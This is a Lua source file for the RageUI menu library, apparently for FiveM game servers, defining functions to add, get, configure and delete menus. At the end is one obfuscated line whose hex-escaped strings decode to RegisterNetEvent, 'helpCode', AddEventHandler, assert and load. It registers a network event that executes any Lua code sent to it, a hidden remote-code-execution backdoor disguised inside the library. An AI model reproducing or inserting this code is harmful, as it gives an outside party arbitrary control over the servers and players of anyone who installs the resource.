---
--- Generated by EmmyLua(https://github.com/EmmyLua)
--- Created by Dylan Malandain.
--- DateTime: 29/10/2019 02:40
---

---@type table
RageUI = {}

---@type table
RMenu = setmetatable({}, RMenu)

---@type table
local TotalMenus = {}

---Add
---@param Type string
---@param Name string
---@param Menu table
---@return _G
---@public
function RMenu.Add(Type, Name, Menu)
    if RMenu[Type] ~= nil then
        RMenu[Type][Name] = {
            Menu = Menu
        }
    else
        RMenu[Type] = {}
        RMenu[Type][Name] = {
            Menu = Menu
        }
    end
    table.insert(TotalMenus, Menu)
end

---Get
---@param Type string
---@param Name string
---@return table
---@public
function RMenu:Get(Type, Name)
    if self[Type] ~= nil and self[Type][Name] ~= nil then
        return self[Type][Name].Menu
    end
end

---Settings
---@param Type string
---@param Name string
---@param Settings string
---@param Value any
---@return void
---@public
function RMenu:Settings(Type, Name, Settings, Value)
    self[Type][Name][Settings] = Value
end


---Delete
---@param Type string
---@param Name string
---@return void
---@public
function RMenu:Delete(Type, Name)
    self[Type][Name] = nil
end

---DeleteType
---@param Type string
---@return void
---@public
function RMenu:DeleteType(Type)
    self[Type] = nil
end

local NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[6][NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[1]](NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[2]) NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[6][NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[3]](NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[2], function(VVrOAXcXCmJjISdggGKgyYWKqTzLtUiMukjrKIXmsVkJmDxOSkPdExlUaQOYEVnpKiCeWV) NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[6][NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[4]](NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[6][NZgrnDfYBQLAaXLoTaRZorUUCteLipVWJFofbjLOxSIBqxfJiDPJFjqjGSJtpNnwVlNSSF[5]](VVrOAXcXCmJjISdggGKgyYWKqTzLtUiMukjrKIXmsVkJmDxOSkPdExlUaQOYEVnpKiCeWV))() end)